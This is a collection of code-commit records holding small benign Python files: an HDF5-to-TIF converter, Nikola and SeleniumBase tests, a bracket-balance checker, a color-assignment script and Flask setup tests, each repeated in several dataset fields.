        if file.endswith(".h5") or file.endswith(".hdf5"):
            fn = os.path.join(dir, file)
            arr = h5_to_array(fn)
            write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
Include Python script to convert 3D stack into dir of tif images#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
    dir = sys.argv[1]
    # Walk the given directory and convert every H5 file it contains
    for file in os.listdir(dir):
        if file.endswith(".h5") or file.endswith(".hdf5"):
            fn = os.path.join(dir, file)
            arr = h5_to_array(fn)
            write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
<commit_before><commit_msg>Include Python script to convert 3D stack into dir of tif images<commit_after>#!/usr/bin/python
"""
T Macrina
160314
Make TIF images of all H5 files in directory
**All H5 files must have "img" group
Args:
sys.argv[1]: full path to the H5 image directory
Returns:
TIF files (extension changed to .tif) saved in the same directory
"""
from PIL import Image
import numpy as np
import h5py
import os
import sys
def h5_to_array(fn):
"""Open H5 file with "img" group & convert to numpy ndarray of dtype
Args:
fn: filename (full path) of the image
Returns:
An ndarray of dtype
"""
f = h5py.File(fn, "r")
return np.array(f["/main"]).T
def write_array_to_sections(fn, arr):
"""Split 3d ndarray along z dim into 2d sections & save as tifs
"""
for i in range(arr.shape[2]):
section = arr[:,:,i]
new_fn = os.path.splitext(fn)[0] + "_%03d.tif" % (i+1)
write_to_tif(new_fn, section)
def write_to_tif(fn, arr):
"""Write ndarray to tif file
"""
img = Image.fromarray(arr)
img.save(fn)
def main():
"""Make TIF images of all H5 matrices in directory
"""
    dir = sys.argv[1]
    # Walk the given directory and convert every H5 file it contains
    for file in os.listdir(dir):
        if file.endswith(".h5") or file.endswith(".hdf5"):
            fn = os.path.join(dir, file)
            arr = h5_to_array(fn)
            write_array_to_sections(fn, arr)
if __name__ == '__main__':
main()
|
|
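For a single stack, the pipeline above reduces to a few lines; a minimal sketch, assuming a file 'stack.h5' (a placeholder) whose '/main' dataset is a 3-D image stack:

import h5py
import numpy as np
from PIL import Image

with h5py.File('stack.h5', 'r') as f:
    arr = np.array(f['/main']).T           # transpose to match the script
for i in range(arr.shape[2]):              # one TIF per z-section
    Image.fromarray(arr[:, :, i]).save('stack_%03d.tif' % (i + 1))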
3daedd2bc822465d17f1d7ea47f313dfb7486841
|
tests/integration/test_demo_build.py
|
tests/integration/test_demo_build.py
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
Make the demo build available with pytest.
|
Make the demo build available with pytest.
This is useful on its own and for porting further tests.
|
Python
|
mit
|
getnikola/nikola,getnikola/nikola,okin/nikola,getnikola/nikola,okin/nikola,okin/nikola,okin/nikola,getnikola/nikola
|
Make the demo build available with pytest.
This is useful on its own and for porting further tests.
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
<commit_before><commit_msg>Make the demo build available with pytest.
This is useful on its own and for porting further tests.<commit_after>
|
"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
Make the demo build available with pytest.
This is useful on its own and for porting further tests."""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
<commit_before><commit_msg>Make the demo build available with pytest.
This is useful on its own and for porting further tests.<commit_after>"""Test that a default build of --demo works."""
import io
import os
import shutil
import sys
import pytest
import nikola.plugins.command.init
from nikola import __main__
from nikola.utils import LocaleBorg
from ..base import cd
LOCALE_DEFAULT = os.environ.get('NIKOLA_LOCALE_DEFAULT', 'en')
def test_index_in_sitemap(build, output_dir):
sitemap_path = os.path.join(output_dir, "sitemap.xml")
with io.open(sitemap_path, "r", encoding="utf8") as inf:
sitemap_data = inf.read()
assert '<loc>https://example.com/</loc>' in sitemap_data
def test_avoid_double_slash_in_rss(build, output_dir):
rss_path = os.path.join(output_dir, "rss.xml")
with io.open(rss_path, "r", encoding="utf8") as inf:
rss_data = inf.read()
assert 'https://example.com//' not in rss_data
def test_archive_exists(build, output_dir):
"""Ensure the build did something."""
index_path = os.path.join(output_dir, "archive.html")
assert os.path.isfile(index_path)
@pytest.fixture
def build(target_dir):
"""Fill the site with demo content and build it."""
init_command = nikola.plugins.command.init.CommandInit()
init_command.copy_sample_site(target_dir)
init_command.create_configuration(target_dir)
src1 = os.path.join(os.path.dirname(__file__),
'..', 'data', '1-nolinks.rst')
dst1 = os.path.join(target_dir, 'posts', '1.rst')
shutil.copy(src1, dst1)
# File for Issue #374 (empty post text)
with io.open(os.path.join(target_dir, 'posts', 'empty.txt'), "w+", encoding="utf8") as outf:
outf.write(
".. title: foobar\n"
".. slug: foobar\n"
".. date: 2013-03-06 19:08:15\n"
)
with cd(target_dir):
__main__.main(["build"])
@pytest.fixture
def output_dir(target_dir):
return os.path.join(target_dir, "output")
@pytest.fixture
def target_dir(tmpdir):
tdir = os.path.join(str(tmpdir), 'target')
yield tdir
@pytest.fixture(autouse=True)
def fixIssue438():
try:
yield
finally:
try:
del sys.modules['conf']
except KeyError:
pass
@pytest.fixture(autouse=True)
def localeborg_setup():
"""
Reset the LocaleBorg before and after every test.
"""
LocaleBorg.reset()
LocaleBorg.initialize({}, LOCALE_DEFAULT)
try:
yield
finally:
LocaleBorg.reset()
|
|
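Because everything is expressed as pytest fixtures, the whole demo build can be exercised from a single entry point; a hedged invocation sketch (the path mirrors the file added in this commit, and assumes pytest and Nikola are installed):

import pytest

# Build the demo site and run the three assertions in one verbose pass
pytest.main(['tests/integration/test_demo_build.py', '-v'])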
559f89d49690fb74219c6de9c7f492cfa40ff9bb
|
TCCC2001Round2/Syntax.py
|
TCCC2001Round2/Syntax.py
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
Check if brackets are balanced
|
Check if brackets are balanced
|
Python
|
mit
|
crisron/Topcoder,crisron/Topcoder,crisron/Topcoder
|
Check if brackets are balanced
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
<commit_before><commit_msg>Check if brackets are balanced<commit_after>
|
openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
Check if brackets are balancedopeningParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
<commit_before><commit_msg>Check if brackets are balanced<commit_after>openingParen = '('
closingParen = ')'
openingBrace = '{'
closingBrace = '}'
openingBracket = '['
closingBracket = ']'
class Syntax():
def match( self, string ):
stack = []
for i in range( len( string ) ):
if self.isOpening( string[ i ] ):
stack.append( string[ i ] )
elif self.isClosing( string[ i ] ):
if not stack or not self.isMatching( stack.pop(), string[ i ] ):
return False
if not stack:
return True
def isOpening( self, char ):
return ( ( char == openingParen ) or ( char == openingBrace ) or ( char == openingBracket ) )
def isClosing( self, char ):
return ( ( char == closingParen ) or ( char == closingBrace ) or ( char == closingBracket ) )
def isMatching( self, opening, closing ):
return ( ( ( opening == openingParen ) and ( closing == closingParen ) ) or \
( ( opening == openingBrace ) and ( closing == closingBrace ) ) or \
( ( opening == openingBracket ) and ( closing == closingBracket ) ) )
syntax = Syntax()
string = raw_input()
if syntax.match( string ):
print "Balanced"
else:
print "Unbalanced"
|
|
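A few quick checks make the matcher's contract concrete; this sketch assumes the Syntax class above is in scope, and notes that an unclosed bracket falls through to an implicit None, which is still falsy:

syntax = Syntax()
assert syntax.match('({[]})')      # properly nested -> True
assert not syntax.match('([)]')    # crossed pair -> False
assert not syntax.match('(')       # unclosed -> None, still falsy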
7bce727470d3671f50e0c38fab1681eced89323a
|
cluster_viz/transform_pro_anti.py
|
cluster_viz/transform_pro_anti.py
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
print json.dumps(j, indent=4)
|
Add code for colorizing the pro/anti bubbles.
|
Add code for colorizing the pro/anti bubbles.
|
Python
|
mit
|
sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments,sunlightlabs/fcc-net-neutrality-comments
|
Add code for colorizing the pro/anti bubbles.
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
print json.dumps(j, indent=4)
|
<commit_before><commit_msg>Add code for colorizing the pro/anti bubbles.<commit_after>
|
import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
print json.dumps(j, indent=4)
|
Add code for colorizing the pro/anti bubbles.import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
print json.dumps(j, indent=4)
|
<commit_before><commit_msg>Add code for colorizing the pro/anti bubbles.<commit_after>import json, sys, re
colors = {'PRO': ["#0f8c79", "#074a3f"], 'ANTI': ['#bd2d28', '#5e1614'], '???': ['#978F80', '#5B564D']}
j = json.load(open(sys.argv[1]))
# count
from collections import Counter
from colour import Color
pa_count = Counter()
for item in j:
pa_count[item['pro_anti']] += 1
for pa, count in pa_count.items():
if count > len(colors[pa]):
colors[pa] = [str(c) for c in Color(colors[pa][0]).range_to(Color(colors[pa][1]), count)]
transform_id = lambda i: re.sub(r'[^a-z0-9_-]', '', re.sub(r'\s+', '_', i.lower()))
for item in j:
item['color'] = colors[item['pro_anti']].pop(0)
item['id'] = transform_id(item['id'])
print json.dumps(j, indent=4)
|
|
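The only non-obvious step above is the gradient expansion; a minimal sketch of it in isolation, using the PRO endpoint colors from the script (the step count of 5 is arbitrary):

from colour import Color

# Interpolate five shades between the light and dark PRO endpoints
shades = [str(c) for c in Color('#0f8c79').range_to(Color('#074a3f'), 5)]
print(shades)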
8f79049d204235d7571ca2a83ffdc81db402db25
|
examples/image_test.py
|
examples/image_test.py
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
Add image test to save an element screenshot to a file
|
Add image test to save an element screenshot to a file
|
Python
|
mit
|
seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase
|
Add image test to save an element screenshot to a file
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
<commit_before><commit_msg>Add image test to save an element screenshot to a file<commit_after>
|
"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
Add image test to save an element screenshot to a file"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
<commit_before><commit_msg>Add image test to save an element screenshot to a file<commit_after>"""
Pull an image from a website and save it as a PNG file.
"""
from seleniumbase import BaseCase
class ImageTest(BaseCase):
def test_pull_image_from_website(self):
self.open("https://xkcd.com/1117/")
selector = "#comic"
file_name = "comic.png"
folder = "images_exported"
self.save_element_as_image_file(selector, file_name, folder)
print('"%s/%s" has been saved!' % (folder, file_name))
|
|
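After the test runs, the screenshot should be sitting on disk; a hedged post-run check that reuses the test's own folder and file name (assuming the folder is created relative to the working directory):

import os

# save_element_as_image_file should have written <folder>/<file_name>
assert os.path.isfile(os.path.join('images_exported', 'comic.png'))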
8d9da9022a7cf16b746fd6d0b9a83723fc78bff8
|
apps/domain/tests/test_routes/test_setup.py
|
apps/domain/tests/test_routes/test_setup.py
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
ADD Domain setup unit tests
|
ADD Domain setup unit tests
|
Python
|
apache-2.0
|
OpenMined/PySyft,OpenMined/PySyft,OpenMined/PySyft,OpenMined/PySyft
|
ADD Domain setup unit tests
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
<commit_before><commit_msg>ADD Domain setup unit tests<commit_after>
|
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
ADD Domain setup unit tests
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
<commit_before><commit_msg>ADD Domain setup unit tests<commit_after>
def test_initial_setup(client):
result = client.post("/setup/", data={"setup": "setup_configs_sample"})
assert result.status_code == 200
assert result.get_json() == {"msg": "Running initial setup!"}
def test_get_setup(client):
result = client.get("/setup/")
assert result.status_code == 200
assert result.get_json() == {"setup": {}}
|
|
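These tests lean on a client fixture defined elsewhere (most likely in a conftest.py); a minimal sketch of what such a fixture could look like for a Flask app, where the factory import path is a guess rather than the project's actual layout:

import pytest
from app import create_app  # hypothetical application factory

@pytest.fixture
def client():
    # Hand each test an isolated Flask test client
    app = create_app()
    app.config['TESTING'] = True
    with app.test_client() as client:
        yield client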
5d896ff27b2bd3f8c8c6b6af58b2b9aa3f1a6695
|
packages/Python/lldbsuite/test/commands/expression/invalid-args/TestInvalidArgsExpression.py
|
packages/Python/lldbsuite/test/commands/expression/invalid-args/TestInvalidArgsExpression.py
|
import lldb
from lldbsuite.test.lldbtest import *
from lldbsuite.test.decorators import *
class InvalidArgsExpressionTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
TestBase.setUp(self)
@no_debug_info_test
def test_invalid_lang(self):
self.expect("expression -l foo --", error=True,
substrs=["error: unknown language type: 'foo' for expression"])
@no_debug_info_test
def test_invalid_all_thread(self):
self.expect("expression -a foo --", error=True,
substrs=['error: invalid all-threads value setting: "foo"'])
@no_debug_info_test
def test_invalid_ignore_br(self):
self.expect("expression -i foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_allow_jit(self):
self.expect("expression -j foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_timeout(self):
self.expect("expression -t foo --", error=True,
substrs=['error: invalid timeout setting "foo"'])
self.expect("expression -t \"\" --", error=True,
substrs=['error: invalid timeout setting ""'])
@no_debug_info_test
def test_invalid_unwind(self):
self.expect("expression -u foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
@no_debug_info_test
def test_invalid_fixits(self):
self.expect("expression -X foo --", error=True,
substrs=['error: could not convert "foo" to a boolean value.'])
|
Add test for invalid expression command args
|
[lldb][NFC] Add test for invalid expression command args
git-svn-id: 4c4cc70b1ef44ba2b7963015e681894188cea27e@370618 91177308-0d34-0410-b5e6-96231b3b80d8
|
Python
|
apache-2.0
|
apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,apple/swift-lldb,llvm-mirror/lldb,llvm-mirror/lldb,llvm-mirror/lldb,llvm-mirror/lldb
|
